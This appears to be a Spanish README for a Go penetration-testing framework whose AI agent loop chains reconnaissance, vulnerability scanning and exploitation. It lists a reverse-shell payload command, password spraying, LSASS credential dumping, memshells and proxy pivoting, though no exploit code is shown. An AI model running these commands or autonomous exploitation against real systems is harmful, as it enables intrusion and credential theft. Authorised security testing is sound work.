
Framework de pruebas de penetración con motor de decisión basado en IA
Framework de pruebas de penetración nativo de Windows escrito en Go. Arquitectura modular con motor de decisión impulsado por IA (API compatible con OpenAI).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
Compilación cruzada:
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
Copia .env.example a .env:
Sin configuración de IA, la herramienta se ejecuta en modo CLI manual (todas las opciones funcionan con normalidad).
Cuando OPENAI_API_KEY está configurada, la herramienta ejecuta un bucle ReAct: el agente de IA decide qué herramientas llamar según los resultados anteriores. El prompt del sistema define un flujo de trabajo de pentest: reconocimiento -> huella digital -> escaneo de vulnerabilidades -> explotación -> informe.
Sin IA, toda la funcionalidad está disponible mediante las opciones de CLI.
| Opción | Descripción |
|---|
-t | Dominio/IP/URL objetivo |
-p | Puertos (coma o rango, por defecto: 80,443,22,21,3389,3306,6379,27017) |
-subdomain | Enumeración de subdominios |
-portscan | Escaneo de puertos TCP |
-fingerprint | Huella digital de servicios |
-dirbuster | Fuerza bruta de directorios |
-vulnscan | Escaneo de vulnerabilidades basado en POC |
-logic | Comprobaciones de vulnerabilidades lógicas |
-spray | Rociado de contraseñas |
-exploit | Módulos de explotación |
-report | Generar informe HTML + JSON |
-o | Archivo de salida (por defecto: report.html) |
-socks | Iniciar proxy SOCKS5 en el puerto |
-httpproxy | Iniciar proxy HTTP en el puerto |
-forward | Reenvío de puertos (local:host:remoto) |
-payload | Generar payload (revshell|IP|PUERTO) |
-v | Verboso |
-debug | Salida de depuración |
-workers | Trabajadores concurrentes (por defecto: 20) |
-timeout | Tiempo de espera de solicitud en segundos (por defecto: 30) |
-proxy | URL del proxy |
-audit | Ruta del registro de auditoría (por defecto: audit.json) |
| Variable | Descripción |
|---|
OPENAI_BASE_URL | URL base de API compatible con OpenAI |
OPENAI_API_KEY | Clave de API |
OPENAI_MODEL_NAME | Modelo (por defecto: gpt-4) |
PROXY | URL del proxy |
MAX_WORKERS | Máximo de trabajadores (por defecto: 20) |
REQUEST_TIMEOUT | Tiempo de espera en segundos (por defecto: 30) |
RETRY_COUNT | Reintentos (por defecto: 3) |
| Paquete | Descripción |
|---|
cmd/fucker/ | Punto de entrada, parseo de CLI, orquestación de módulos |
internal/ai/ | Cliente de OpenAI, bucle de agente ReAct, sistema de herramientas |
internal/scanner/ | Escaneo de puertos, subdominios, huella digital, dirbuster |
internal/vuln/ | Motor de POCs YAML, 16 POCs integrados, comprobadores lógicos |
internal/exploit/ | Generador de shell inversa, proxy SOCKS5/HTTP, memshell |
internal/lateral/ | Rociado de contraseñas, minidump de LSASS, proxy SMB/RDP |
internal/report/ | Informe con plantilla HTML, exportación JSON, puntuación de riesgo |
internal/logger/ | Registro por niveles, rastro audit.json |
internal/plugin/ | Cargador de complementos Python/Go |
internal/config/ | Cargador de .env |
internal/common/ | Tipos compartidos |